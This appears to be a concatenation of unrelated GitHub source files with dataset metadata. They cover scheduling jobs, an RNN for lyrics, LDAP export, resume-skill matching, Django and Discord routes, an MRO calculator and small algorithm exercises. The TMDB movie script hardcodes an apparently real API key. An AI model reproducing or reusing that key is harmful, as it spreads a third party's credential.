jitter=5,\n\n        # Option for using job store\n        jobstore='sqlite',\n        replace_existing=True,\n    )\n\n    scheduler.add_job(\n        id='cron_everyday',\n        func=schedule_cron_everyday,\n        trigger='cron',\n        hour='20',\n        minute='5',\n        jitter=60,\n\n        # Option for using job store\n        jobstore='sqlite',\n        replace_existing=True,\n    )\n\n    scheduler.add_job(\n        id='cron_every_quarter',\n        func=schedule_cron_every_quarter,\n        trigger='cron',\n        month='*/3',\n        day='19',\n        hour='0',\n        minute='10',\n        jitter=300,\n\n        # Option for using job store\n        jobstore='sqlite',\n        replace_existing=True,\n    )\n\n    # scheduler.add_job(\n    #     id='close_ssh',\n    #     func=schedule_close_ssh,\n    #     trigger='cron',\n    #     minute='*/5',\n    #     jitter=10,\n    #     misfire_grace_time=None\n    # )\n\n    scheduler.add_listener(\n        listener_log, EVENT_JOB_EXECUTED | EVENT_JOB_ERROR\n    )\n    return scheduler\n","repo_name":"korawica/dfa-flask-postgres","sub_path":"application/schedules.py","file_name":"schedules.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27353352774","text":"import torch\nimport string\nimport random\nimport math\nimport time\nimport matplotlib\nfrom io import open\n\n# select the backend before pyplot is imported\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\nalphabet = string.ascii_letters\nn_letters = len(alphabet)\n\n\ndef groupSongs(filename):\n    lines = open(filename, encoding='latin-1').read().strip().split('\\n')\n    song_dict = {}\n    for line in lines:\n        line_list = line.split(',')\n        # Throwaway label & get rid of unavailable lyrics\n        if 'Year' not in str(line_list[3]) and line_list[4] not in [\" \", \"NA\", \"instrumental\"]:\n            song_dict[line_list[4]] = line_list[3]\n    return song_dict\n\n\ndef getLetterIndex(letter):\n    return alphabet.find(letter)\n\n\ndef letterToTensor(letter):\n    tensor = torch.zeros(1, n_letters)\n    tensor[0][getLetterIndex(letter)] = 1\n    return tensor\n\n\ndef lyricsToTensor(lyrics):\n    tensor = torch.zeros(len(lyrics), 1, n_letters)\n    for li, letter in enumerate(lyrics):\n        tensor[li][0][getLetterIndex(letter)] = 1\n    return tensor\n\n\ndef timeSince(since):\n    now = time.time()\n    s = now - since\n    m = math.floor(s / 60)\n    s -= m * 60\n    return '%dm %ds' % (m, s)\n\n\ndef yearFromOutput(output):\n    \"\"\" Formats the output to consist of just the predicted year. \"\"\"\n    top_n, top_i = output.topk(1)\n    category_i = top_i[0].item()\n    return int(category_i) + 1965\n\n\ndef randomTrainingExample(song_dict):\n    lyric, year = random.choice(list(song_dict.items()))\n    year_tensor = torch.tensor([int(year) - 1965], dtype=torch.long)\n    lyric_tensor = lyricsToTensor(lyric)\n    return year, lyric, year_tensor, lyric_tensor\n\n\ndef trainRNN(category_tensor, line_tensor, rnn):\n    hidden = rnn.initHidden()\n    rnn.optimizer.zero_grad()  # zero the parameter gradients\n\n    for i in range(line_tensor.size()[0]):\n        output, hidden = rnn(line_tensor[i], hidden)\n\n    loss = rnn.criterion(output, category_tensor)\n    loss.backward()\n\n    # clip gradient to address exploding gradient problem\n    clip = 5\n    torch.nn.utils.clip_grad_norm_(rnn.parameters(), clip)\n\n    # the optimizer step applies the gradient update; a second, manual\n    # parameter update after it would apply each gradient twice\n    rnn.optimizer.step()\n    return output, loss.item()\n\n\ndef testRNN():\n    pass\n\n\ndef plotAccuracy(xvals, yvals):\n    plt.plot(xvals, yvals)\n    plt.xlabel('Epoch')\n    plt.ylabel('Accuracy (% Correct Guesses)')\n    plt.savefig(\"../results/accuracy.png\")\n\ndef plotLoss(xvals, yvals):\n    plt.plot(xvals, yvals)\n    plt.xlabel('Epoch')\n    plt.ylabel('Loss')\n    plt.savefig(\"../results/losses.png\")","repo_name":"tem373/LyricLearn","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14789866412","text":"\"\"\"\r\nCalculate the average number of tosses needed to land a coin on both sides\r\n\"\"\"\r\n\r\nfrom random import randint\r\n\r\ntrials = 100000\r\nflips = 0\r\n\r\nfor trial in range(trials):\r\n    flips += 1\r\n\r\n    first_flip = randint(0, 1)\r\n\r\n    # keep tossing until we get the different outcome\r\n    while randint(0, 1) == first_flip:\r\n        flips += 1\r\n    flips += 1\r\n\r\nprint(\"The average number of tosses to land on both heads and tails is\", flips / trials)\r\n","repo_name":"nkspb/python-projects","sub_path":"coin_toss.py","file_name":"coin_toss.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"856979199","text":"#!/usr/bin/python\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n
# along with this program.  If not, see <http://www.gnu.org/licenses/>.\n\nimport sys, matplotlib\n# Force matplotlib to not use any Xwindows backend.\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nsegment_duration = [float(i) for i in sys.argv[1].split(',')]\n\nmin_val = min(segment_duration)\nmax_val = max(segment_duration)\navg_val = sum(segment_duration)/len(segment_duration)\n\nindex = list(range(len(segment_duration)))\n\nplt.hist(segment_duration)\nplt.ylabel('Frequency')\nplt.xlabel('Duration (sec)')\nplt.title('Segment duration histogram')\n\n# Arrange for legend showing max, min and avg values of durations.\n# Named *_line to avoid shadowing the built-in max/min functions.\nmax_line, = plt.plot([], label='Max = '+str(format(max_val, '.2f'))+' sec')\nmin_line, = plt.plot([], label='Min = '+str(format(min_val, '.2f'))+' sec')\navg_line, = plt.plot([], label='Avg = '+str(format(avg_val, '.3f'))+' sec')\n\nif (sys.argv[2] == 'Not_Set'):\n\tduration_line, = plt.plot([], label='MPD duration = '+sys.argv[2])\nelse:\n\tduration_line, = plt.plot([], label='MPD duration = '+sys.argv[2]+' sec')\n#plt.legend(handles=[max_line, min_line, avg_line, duration_line], loc=0)\nplt.legend()\n\nplt.savefig(sys.argv[3])\n","repo_name":"Dash-Industry-Forum/HbbTV_DVB","sub_path":"seg_duration.py","file_name":"seg_duration.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12776603155","text":"import requests\nfrom pprint import pprint\n\n# 2. Print movies that meet a specific condition\ndef vote_average_movies():\n    # 0. Initialize the list that will hold movies rated 8 or higher\n    vote_average_movies_over_8 = []\n\n    BASE_URL = 'https://api.themoviedb.org/3'\n    path = '/movie/popular'\n    params = {\n        'api_key': 'ea7605a7a7e59759ce6acfc9527a9e1a',\n        'language': 'ko-KR'\n    }\n\n    response = requests.get(BASE_URL+path, params=params).json()\n    # 3. Assign the 'results' field of the response to `movie_details`\n    movie_details = response.get('results', None)\n\n    # 5. Iterate over movie_details\n    for movie_detail in movie_details:\n        # 6. Check each movie's rating\n        vote_average = movie_detail.get('vote_average', None)\n        # 7. If rated 8 or higher, append the movie to vote_average_movies_over_8\n        if vote_average >= 8:\n            vote_average_movies_over_8.append(movie_detail)\n\n    # 8. Return the list of movies rated 8 or higher\n    return vote_average_movies_over_8\n\n\n\n
if __name__ == '__main__':\n    pprint(vote_average_movies()) ","repo_name":"ksy133900/TIL","sub_path":"Project/0722/01.인기 영화 조회.py","file_name":"01.인기 영화 조회.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"21660107656","text":"#!/usr/bin/env python3\n# \n# NAME: Ldap Tool Script\n# DESC: Script to get an ldif from an LDAP Directory where uids are filtered by CSV file\n# AUTHOR: Florentin PERRIER\n# VERSION: 1.0\n\nfrom ldap3 import Server, Connection, ALL\nfrom ldap3.core.exceptions import LDAPSocketOpenError\nfrom argparse import ArgumentParser\nimport csv\nimport os.path\n\nclass pcolors:\n    ERROR = '\\033[91m'\n    WARNING = '\\033[93m'\n    CYAN = '\\033[96m'\n    END = '\\033[0m'\n    GREEN = '\\033[92m'\n    BOLD = '\\033[1m'\n\ndef hello ():\n    print(\"LDAP TOOL SCRIPT\")\n    print(\"Transfer from LDAP to LDIF\")\n\ndef info(msg):\n    print(\"[INFO] \" + pcolors.CYAN + msg + pcolors.END)\ndef warn (msg):\n    print(\"[WARNING] \" + pcolors.WARNING + msg + pcolors.END)\ndef error (msg):\n    print(\"[ERROR] \" + pcolors.ERROR + msg + pcolors.END)\n\ndef getFilter(file):\n    uids=[]\n    with open(file) as csvfile:\n        reader=csv.reader(csvfile, delimiter=';')\n        i=None\n        for row in reader:\n            if(i is None):\n                i=row.index('login')\n            else:\n                uids.append(row[i])\n    return uids\n\ndef ldapToLdif(url,dn,password,filter,out):\n\n    ldif=\"version: 1\\n\"\n\n    try:\n        file=open(out, \"x\")\n        file.write(ldif)\n\n        srv = Server(url, get_info=ALL)\n        conn = Connection(srv, dn, password)\n        conn.bind()\n\n        cok=0\n        cwarn=0\n\n        if (filter == []):\n            file.write(\"# Nothing to show\")\n        else:\n            for uid in filter:\n                conn.search('OU=people,DC=agroparistech,DC=FR','(uid='+uid+')',attributes = ['*'])\n                tmp=conn.response_to_ldif()\n                for line in tmp.splitlines():\n                    if \"version:\" in line:\n                        tmp=tmp.replace(line,'')\n                    elif \"# total number of entries: 1\" in line:\n                        tmp=tmp.replace(line,'')\n                if(len(tmp.splitlines())>5):\n                    info(\"UID=\"+uid+\": OK\")\n                    cok=cok+1\n                else:\n                    warn(\"UID=\"+uid+\": ??\")\n                    cwarn=cwarn+1\n                file.write(tmp)\n\n        print('\\n'+pcolors.BOLD+pcolors.GREEN+\"Ok: \"+str(cok)+pcolors.WARNING+\"\\nWarn: \"+str(cwarn)+pcolors.END+pcolors.BOLD+\"\\nTotal: \"+str(cok+cwarn)+pcolors.END+'\\n')\n\n        file.close()\n\n    except FileExistsError:\n        error(\"File \"+out+\" already exists\")\n        exit(1)\n    except LDAPSocketOpenError:\n        error(\"The script could not connect to the LDAP server\")\n        if (os.path.isfile(out)):\n            os.remove(out)\n        exit(1)\n\ndef run(args):\n\n    out=\"out.ldif\"\n\n    if(args.ldap_to_ldif is None):\n        error(\"--ldap-to-ldif necessary\")\n        exit(1)\n    if(args.out is not None):\n        out=args.out\n\n    hello()\n    ldapToLdif(args.ldap_to_ldif[0],args.ldap_to_ldif[1],args.ldap_to_ldif[2], getFilter(args.filter), out)\n    info(out+\" saved!\\n[END]\")\n    exit(0)\n\nparser = ArgumentParser(description=\"By Florentin PERRIER\\nv1.0.0\")\nparser.add_argument('--ldap-to-ldif', nargs=3, metavar=(\"HOST_URL\", \"DN\", \"PASSWORD\"),help=\"Get entity from ldap directory server.\\nHost URL can be: - ldap[s]://HOSTNAME.DOMAIN:PORT\")\nparser.add_argument('-f','--filter', metavar=\"CSV_FILE_IN\", help=\"Filters on UID only! Requires a CSV file: delimiter ';', one column whose first value is the word login, followed by all the uids.\")\n
parser.add_argument('-o', '--out', metavar='OUT_FILE', help='Specify output file (For --X-to-ldif) - default: out.ldif')\nargs = parser.parse_args()\n\nrun(args)\n","repo_name":"FlooowW/ldap-tool-script","sub_path":"getldap.py","file_name":"getldap.py","file_ext":"py","file_size_in_byte":3584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26771949687","text":"from flask import Flask, request, jsonify\nimport os\nimport PyPDF2\nfrom docx import Document\n# imports\nimport spacy\nfrom spacy.matcher import PhraseMatcher\nfrom sklearn.metrics.pairwise import cosine_similarity  # Import cosine_similarity\nfrom io import BytesIO\nimport tempfile\n\n# load default skills data base\nfrom skillNer.general_params import SKILL_DB\n# import skill extractor\nfrom skillNer.skill_extractor_class import SkillExtractor\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n#import numpy as np\n\napp = Flask(__name__)\nnlp = None\nskill_extractor = None\n\ndef initialize_nlp_and_skill_extractor():\n    global nlp\n    global skill_extractor\n\n    if nlp is None:\n        nlp = spacy.load(\"en_core_web_md\")\n        skill_extractor = SkillExtractor(nlp, SKILL_DB, PhraseMatcher)\n\n\ndef extract_text_from_pdf(pdf_path):\n    with open(pdf_path, 'rb') as file:\n        reader = PyPDF2.PdfReader(file)\n        text = ''\n        for page_num in range(len(reader.pages)):\n            text += reader.pages[page_num].extract_text()\n    return text\n\ndef extract_text_from_docx(docx_file):\n    try:\n        doc = Document(docx_file)\n        text = ''\n        for para in doc.paragraphs:\n            text += para.text + '\\n'\n        return text\n    except Exception as e:\n        return str(e)\n\ndef extract_text_from_folder(files):\n    extracted_text_dict = {}  # Initialize an empty dictionary\n    temp_dir = tempfile.TemporaryDirectory(prefix='pdf_temp')\n    for file in files:\n        filename = file.filename\n        if filename.endswith('.pdf'):\n            pdf_path = os.path.join(temp_dir.name, filename)\n            file.save(pdf_path)\n            extracted_text = extract_text_from_pdf(pdf_path)\n        elif filename.endswith('.docx'):\n            extracted_text = extract_text_from_docx(file)\n        else:\n            extracted_text = ''  # Handle other file types if needed\n\n        extracted_text_dict[filename] = extracted_text  # Store text with filename as key\n\n    return extracted_text_dict\n\n# Function to calculate skill match score (cosine similarity)\ndef calculate_skill_match_score(resume_text, job_description_text):\n    # Process the text using spaCy to get document representations\n    resume_doc = nlp(resume_text)\n    job_description_doc = nlp(job_description_text)\n\n    # Calculate cosine similarity using spaCy's built-in similarity method\n    similarity = resume_doc.similarity(job_description_doc)\n\n    return similarity\n\n@app.route('/extract-text', methods=['POST'])\ndef extract_text():\n    initialize_nlp_and_skill_extractor()\n    files = request.files.getlist('files')  # 'files' should be the name of the input field in your HTML form\n    if not files:\n        return jsonify({'error': 'No files provided'})\n\n    if 'job_description' not in request.form:\n        return jsonify({'error': 'No job description provided'})\n\n    job_description = request.form['job_description']\n\n    extracted_text_dict = extract_text_from_folder(files)\n\n    # Convert job description and its skills to a single text\n    job_description_annotations = skill_extractor.annotate(job_description)\n    job_description_annotations_list =
list({match['doc_node_value'] for match in job_description_annotations['results']['full_matches']})\n job_description_text = \" \".join(job_description_annotations_list)\n\n # Create dictionaries to store skills and scores for each resume\n job_description_skills = job_description_annotations_list\n resumes_skills = {}\n resumes_scores = {}\n\n for filename, text in extracted_text_dict.items():\n # Extract skills using the SkillExtractor for each file's text\n resumes_annotations = skill_extractor.annotate(text)\n resumes_annotations_list = list({match['doc_node_value'] for match in resumes_annotations['results']['full_matches']})\n\n # Convert resume skills to a single text\n resume_text = \" \".join(resumes_annotations_list)\n\n # Calculate the skill match score (cosine similarity)\n similarity_score = calculate_skill_match_score(resume_text, job_description_text)\n cosine_similarity_score = round(similarity_score * 100, 2)\n\n resumes_skills[filename] = resumes_annotations_list\n resumes_scores[filename] = cosine_similarity_score\n \n # Clear resume_text after processing each resume\n resume_text = \"\"\n\n result_dict = {\n 'job_description_skills': job_description_skills,\n 'resumes_skills': resumes_skills,\n 'resumes_scores': resumes_scores\n }\n\n return jsonify(result_dict)\n\n\n@app.route('/', methods=['GET'])\ndef test():\n return \"test\"\n\nif __name__ == '__main__':\n app.run()","repo_name":"omar1890/hr_model","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14370560045","text":"import discord\nfrom discord.commands import slash_command, Option\nfrom utils.converters import FetchAccount\nfrom exceptions import ConnectionNotFound\nfrom utils.autocompleters import account_searcher\n\n@slash_command(\n name=\"photos\",\n description=\"Browse through a player's RecNet posts.\"\n)\nasync def photos(\n self, \n ctx: discord.ApplicationContext,\n account: Option(FetchAccount, name=\"username\", description=\"Enter RR username\", default=None, required=False, autocomplete=account_searcher)\n):\n if not account: # Check for a linked RR account\n account = await self.bot.cm.get_linked_account(self.bot.RecNet, ctx.author.id)\n if not account: raise ConnectionNotFound\n \n group = discord.utils.get(self.__cog_commands__, name='filter')\n command = discord.utils.get(group.walk_commands(), name='custom')\n await command(ctx, taken_by=account)\n\n \n \n\n \n\n \n","repo_name":"RecNetBot-Development/RecNetBot","sub_path":"cogs/image/photos.py","file_name":"photos.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36248044973","text":"text = input()\nn = len(text)\nm = int(input())\nqueries = [list(int(i) - 1 for i in input().split()) for j in range(m)]\n\nsame = [0] * n\nfor i in range(1, n):\n if text[i] == text[i - 1]:\n same[i] = same[i - 1] + 1\n else:\n same[i] = same[i - 1]\n\nfor query in queries:\n print(same[query[1]] - same[query[0]])\n","repo_name":"sharky564/Codeforces","sub_path":"CodeForces Problems 0301-0400/CodeForces Problem 0313B.py","file_name":"CodeForces Problem 0313B.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36652193259","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom . 
import views\ngame_list = views.GameViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\ngame_detail = views.GameViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\nfrom rest_framework.routers import DefaultRouter\n\nrouter = DefaultRouter()\nrouter.register('games', views.GameViewSet)\n\nfrom rest_framework.documentation import include_docs_urls\nurlpatterns = [\n # path('games/', views.GameList.as_view(), name='game-list'),\n # path('games//', views.GameDetail.as_view(), name='game-detail'),\n path('', include(router.urls)),\n path('parser/', views.ParserView.as_view(), name='parser')\n]\n","repo_name":"karrywu123/django_restful","sub_path":"app06/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33545243264","text":"import ast\nfrom typing import Tuple, Sequence\nfrom jedi.api.classes import Name\nfrom mrols.parsed_class import ParsedClass\nfrom mrols.parsed_package_class import ParsedPackageClass\n\n\nclass ParsedCustomClass(ParsedClass):\n \"\"\"\n This class encapsulates a class definition parsed for MRO list calculation\n and all the intermediate results during the calculation.\n\n All the necessary calculation to get the MRO list will be done during the\n initialisation of the instance.\n \"\"\"\n\n def __init__(self, jedi_name: Name, calculator: 'MROCalculator') -> None: # type: ignore\n super().__init__(jedi_name)\n self._calculator = calculator\n # attention: resolve() will raise FileNotFoundError if in Python3.5-\n # or if pass strict=True in Python3.6+\n module_path = str(jedi_name.module_path.resolve())\n # the Jedi Name should have `module_path` available\n if (not module_path):\n raise ValueError(\n \"Jedi Name's module name is not available or not registered.\")\n # load the relevant script if not yet\n if module_path not in calculator.content_cache:\n with open(module_path) as loaded_module:\n calculator.replace_content_in_cache(\n module_path, loaded_module.read())\n # update the analysis result of the relevant script if outdated\n if module_path in calculator.outdated_scripts:\n calculator.update_one(module_path)\n # the script should now be analysed and its path can be used to search\n if module_path not in calculator.jedi_scripts_by_path:\n raise ValueError(\n \"Error when loading Jedi Name's module content into Calculator.\")\n # fetch the relevant Jedi Script, get code lines and class definition\n self._jedi_script = calculator.jedi_scripts_by_path[module_path]\n self._lines = self._get_code_lines()\n self._class_def = self._get_class_def_ast_from_lines()\n # the Jedi Name should have the position information\n if self.jedi_name.line is None or self.jedi_name.column is None:\n raise ValueError(\n f'Parsed class {self.jedi_name.full_name} has no line or column information.')\n # positions with line starting with 1 (Jedi and AST standard)\n self.start_pos: Tuple[int, int] = (\n self.jedi_name.line,\n self.jedi_name.column\n )\n self.end_pos: Tuple[int, int] = (\n self.jedi_name.line,\n self.jedi_name.column + len(self._class_def.name)\n )\n # calculate the Jedi Names of the base parents\n self._base_parent_names = [\n self._jedi_script.infer(\n b.lineno + self.jedi_name.line - 1,\n b.col_offset\n )[0]\n for b in self._class_def.bases\n ] if self._class_def.bases else [self.OBJECT_CLASS]\n # refine the calculated Jedi Names of the base parents to full content\n for i, 
base in enumerate(self._base_parent_names):\n full_candidates = base.goto()\n if full_candidates and isinstance(full_candidates[0], Name):\n self._base_parent_names[i] = full_candidates[0]\n self._mro_parsed_list = None\n\n @property\n def mro_parsed_list(self) -> Sequence[ParsedClass]:\n if not self._mro_parsed_list:\n self._mro_parsed_list = self._get_mro_parsed_list()\n return self._mro_parsed_list\n\n def _get_code_lines(self):\n \"\"\"Get the code block of the class definition, separated by lines.\"\"\"\n # get the start and end positions and then the lines between (inclusive)\n start_pos = self.jedi_name.get_definition_start_position()\n end_pos = self.jedi_name.get_definition_end_position()\n lines = self.jedi_name.get_line_code(\n after=end_pos[0] - start_pos[0]\n ).splitlines()\n # trim the unwanted part in the first and the last lines\n # trim the last line first, otherwise the end position can be corrupted\n # when there is only one line\n lines[-1] = lines[-1][:end_pos[1]]\n lines[0] = lines[0][start_pos[1]:]\n return lines\n\n def _get_class_def_ast_from_lines(self):\n \"\"\"Get the correspondent ast.ClassDef instance.\"\"\"\n codes = '\\n'.join(self._lines)\n mod = ast.parse(codes)\n # there will be one and only one class definition\n return [n for n in mod.body if isinstance(n, ast.ClassDef)][0]\n\n def _get_base_parent_parsed(self):\n \"\"\"Get the list of base parent classes in ParseClass format.\"\"\"\n return [\n self._calculator.parsed_name_by_full_name.get(\n base_name.full_name, ParsedCustomClass(\n base_name, self._calculator)\n ) if base_name.full_name else ParsedPackageClass(base_name)\n for base_name in self._base_parent_names\n ]\n\n def _get_mro_parsed_list(self) -> Sequence[ParsedClass]:\n \"\"\"\n Calculate the MRO list in ParsedClass via the C3 Linearisation\n algorithm.\n\n Details of the algorithm can be found in the `C3 Linearisation`\n Wikipedia page.\n \"\"\"\n base_parent_parsed = self._get_base_parent_parsed()\n merge_list = [\n base_parsed.mro_parsed_list for base_parsed in base_parent_parsed]\n merge_list.append(base_parent_parsed)\n mro_parsed_list = [self] + self._merge_mro_parsed_lists(merge_list)\n return mro_parsed_list\n\n @classmethod\n def _merge_mro_parsed_lists(cls, sublists):\n \"\"\"The merge step in the C3 Linearisation algorithm to merge the MRO\n sublists (elements in ParsedClass) to one result MRO list (elements in\n ParsedClass).\n \"\"\"\n if not sublists:\n return []\n # iterate over all possible next parent class (the head)\n for i, mro_list in enumerate(sublists):\n head = mro_list[0]\n good_head = True\n # check the head candidate is not in any other list tail\n for cmp_list in sublists[:]:\n for parsed in cmp_list[1:]:\n if head == parsed:\n good_head = False\n break\n if not good_head:\n break\n # construct the remaining list to merge if the head is valid\n if good_head:\n next_list = []\n for merge_item in sublists:\n new_list = [\n item for item in merge_item\n if item != head\n ]\n if new_list:\n next_list.append(new_list)\n return [head] + cls._merge_mro_parsed_lists(next_list)\n raise TypeError('Cannot construct MRO list as conflict exists')\n","repo_name":"mosckital/python-mro-language-server","sub_path":"mrols/parsed_custom_class.py","file_name":"parsed_custom_class.py","file_ext":"py","file_size_in_byte":6876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11014529491","text":"\"\"\"Unit tests for :q_learning_frozen_lake.py.\"\"\"\nimport gym\n\nfrom 
labm8.py import app\nfrom labm8.py import test\nfrom learn.deep_reinforcement_learning_course import q_learning_frozen_lake\n\nFLAGS = app.FLAGS\n\n\ndef test_Train():\n \"\"\"End-to-end test.\"\"\"\n q_table = q_learning_frozen_lake.Train(\n gym.make(\"FrozenLake-v0\"),\n total_episodes=10,\n max_steps=2,\n learning_rate=0.8,\n gamma=0.95,\n init_epsilon=1.0,\n min_epsilon=0.01,\n decay_rate=0.01,\n seed=0,\n )\n assert q_table.shape == (16, 4)\n\n\nif __name__ == \"__main__\":\n test.Main()\n","repo_name":"ChrisCummins/phd","sub_path":"learn/deep_reinforcement_learning_course/q_learning_frozen_lake_test.py","file_name":"q_learning_frozen_lake_test.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":181,"dataset":"github-code","pt":"67"} +{"seq_id":"28136183125","text":"import time\nimport json\nimport uuid\nfrom datetime import datetime\nfrom collections import namedtuple\nimport redis\nimport time\nimport importlib\nimport os\nimport hashlib\nimport re\n\nfrom flask import current_app as app\n\nTask = namedtuple('Task', 'task_id task_type task_package')\n\nclass SharedModel(object):\n @staticmethod\n def import_model_class(model_class):\n class_name = re.sub(r'(?/', PartsCategory.as_view(), name='category'),\n path('part//', ShowPart.as_view(), name='part'),\n]","repo_name":"NikolayGlubokov/GlubokovNNnewPC","sub_path":"DZ for GitHub/DZ50GlubokovNN/personal_portfolio/autoparts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24850786591","text":"\"\"\"\n超级丑数 是一个正整数,并满足其所有质因数都出现在质数数组 primes 中。\n\n给你一个整数 n 和一个整数数组 primes ,返回第 n 个 超级丑数 。\n\n题目数据保证第 n 个 超级丑数 在 32-bit 带符号整数范围内。\n\n\n\n示例 1:\n\n输入:n = 12, primes = [2,7,13,19]\n输出:32 \n解释:给定长度为 4 的质数数组 primes = [2,7,13,19],前 12 个超级丑数序列为:[1,2,4,7,8,13,14,16,19,26,28,32] 。\n示例 2:\n\n输入:n = 1, primes = [2,3,5]\n输出:1\n解释:1 不含质因数,因此它的所有质因数都在质数数组 primes = [2,3,5] 中。\n\n提示:\n\n1 <= n <= 106\n1 <= primes.length <= 100\n2 <= primes[i] <= 1000\n题目数据 保证 primes[i] 是一个质数\nprimes 中的所有值都 互不相同 ,且按 递增顺序 排列\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/super-ugly-number\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\nimport heapq\nfrom typing import List\n\n\nclass Solution:\n def nthSuperUglyNumber(self, n: int, primes: List[int]) -> int:\n # import heapq\n arr = [1]\n visited = {1}\n while n > 0:\n ugly = heapq.heappop(arr)\n for pri in primes:\n temp = ugly * pri\n if temp not in visited:\n visited.add(temp)\n heapq.heappush(arr, temp)\n n -= 1\n return ugly\n\n\nclass Solution:\n \"\"\"\n 前言\n 这道题和“264. 
丑数 II”相似,区别在于,第 264 题规定丑数是只包含质因数 2、3 和 5 的正整数,\n 这道题规定超级丑数是只包含数组 primes 中的质因数的正整数。\n 这道题可以使用第 264 题的方法,包括最小堆和动态规划。\n\n 方法一:最小堆\n 要得到从小到大的第 n 个超级丑数,可以使用最小堆实现。\n 初始时堆为空。首先将最小的超级丑数 1 加入堆。\n 每次取出堆顶元素 x,则 x 是堆中最小的超级丑数。对于数组 primes 的任意质数 p,px 也是超级丑数,\n 因此将数组 primes 中的每个质数和 x 的乘积分别加入堆。\n\n 上述做法会导致堆中出现重复元素的情况。为了避免重复元素,可以使用哈希集合去重,避免相同元素多次加入堆。\n 在排除重复元素的情况下,第 n 次从最小堆中取出的元素即为第 n 个超级丑数。\n\n 作者:LeetCode-Solution\n 链接:https://leetcode-cn.com/problems/super-ugly-number/solution/chao-ji-chou-shu-by-leetcode-solution-uzff/\n 来源:力扣(LeetCode)\n 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。\n \"\"\"\n\n def nthSuperUglyNumber(self, n: int, primes: List[int]) -> int:\n seen = {1}\n heap = [1]\n\n for i in range(n):\n ugly = heapq.heappop(heap)\n for prime in primes:\n nxt = ugly * prime\n if nxt not in seen:\n seen.add(nxt)\n heapq.heappush(heap, nxt)\n\n return ugly\n","repo_name":"wanzhouyi/leetcode","sub_path":"1.数组和字符串/堆/313. 超级丑数.py","file_name":"313. 超级丑数.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23144777836","text":"from pessoa import Pessoa\nimport random as r\n\nmarcos=Pessoa()\n\nfunc=[]\nnomes=['Jonas', 'Joaquim', 'Jorge', 'Carlos', 'Carlitos', 'José', 'Omar']\nnomes_usados=[]\n\nfor i in range(10):\n nome=nomes[r.randint(0,6)] #Pega um item aleatório da lista de nomes\n func.append(Pessoa(nome if nome not in nomes_usados else 'Nenhum'))\n #Objetos podem ser adicionados a uma lista, para criar vários\n nomes_usados.append(nome)\n print(func[i].nome, func[i].get_id())\n\n'''Criei uma lista com nomes já usados, mas tem que ser adicionado depois de instancear\na pessoa pois senão dá erro...\n\nfunc.append(Pessoa(nome se nome não está em nomes_usados, senão 'Nenhum'))\n'''\n\nfunc[5]=Pessoa() \n#Pode substituir o item da lista normalmente\n","repo_name":"ppedraum/2022","sub_path":"POO/2022-03-03/ex1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21432229683","text":"import numpy as np\nfrom numpy import zeros, pi, arctan2, sin, cos, sqrt, log, matmul, NaN, dot\nfrom numpy.linalg import inv\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom pymead import DATA_DIR\nimport os\nimport time\nfrom numba import jit\n\n\n@jit(nopython=True, cache=True)\ndef single_element_inviscid(coord: np.ndarray, alpha: float or np.float64):\n r\"\"\"\n A linear strength vortex panel method for the inviscid solution of a single airfoil, sped up using the\n just-in-time compiler in *numba*. Directly adapted from \"Program 7\" of Appendix D in [1].\n\n [1] J. Katz and and A. Plotkin, Low-Speed Aerodynamics, Second Edition, 2nd ed. New York, NY,\n USA: Cambridge University Press, 2004. 